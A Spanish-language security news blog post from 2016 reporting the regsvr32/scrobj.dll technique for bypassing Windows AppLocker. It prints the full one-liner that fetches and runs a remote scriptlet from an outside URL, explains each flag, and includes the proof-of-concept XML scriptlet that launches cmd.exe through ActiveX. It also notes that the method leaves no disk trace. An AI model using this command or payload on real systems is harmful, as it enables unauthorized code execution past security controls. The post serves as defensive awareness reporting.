27 abr. 2016

Saltear Windows AppLocker con un twit

Recientemente un investigador de seguridad llamado Casey Smith ha encontrado (@subtee) una forma bastante simple que puede evadir las restricciones de AppLocker mendiante el fetcher HTTP.
Véase el siguiente comando para Windows 10 Enterprise que cabe en un tweet:
regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll
Regsvr32 es parte del sistema operativo y se puede utilizar para registrar y des-registrar Scripts COM con el registro de Windows.
  • /s le dice a regsvr32 que se ejecute en silencio;
  • mediante /n no usaremos DllRegisterServer;
  • /i pasa un parámetro opcional (nuestra URL) para DllInstall;
  • /u significa que estamos tratando de anular el registro de un objeto y;
  • scrobj.dll es el Script Component Runtime de Microsoft.
Si se le pasa a Regsvr32 una dirección URL a analizar, lo que hace realmente es descargarlo a través de HTTP o HTTPS, incluso a través de proxy, y procesarla. Insertando código JavaScript en un XML y provocando su ejecución mediante la solicitud de anulación del registro de una DLL es posible ejecutar cmd.exe:
[scriptlet]
[registration classid="{F0001111-0000-0000-0000-0000FEEDACDC}" nbsp="" progid="Empire"]
    [!-- Proof Of Concept - Casey Smith @subTee --]
    [script language="JScript"]
        [![CDATA[
    
            [span style="background-color: #ffe599;"]var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");[/span]    
    
        ]]]
[/script]
[/registration]
[/scriptlet]
El Javascript embebido utiliza ActiveX para abrir una consola de comandos. Si cambiamos cmd.exe por cualquier otro programa que no esté en la lista blanca de AppLocker... ¡se ejecutará!
<

El truco (Smith no ha querido llamarlo exploit) es limpio, ya que no toca el registro, no necesita derechos de administrador, puede ser "envuelto" en una sesión HTTP cifrada y no deja ningún rastro en el disco ya que lo descarga a memoria.

Por el momento, no existe un parche para esto y Smith ha creado una colección de Proof-of-Concept para ejecutar distintos tipos de scripts (y shells) en el equipo víctima.

Fuente: The Register | HackPlayers

0 comentarios:

Publicar un comentario

Gracias por dejar un comentario en Segu-Info
Si vas a dejar una consulta, procura tener habilitado tu perfil en Blogger o deja una forma de contacto.

Gracias por comentar!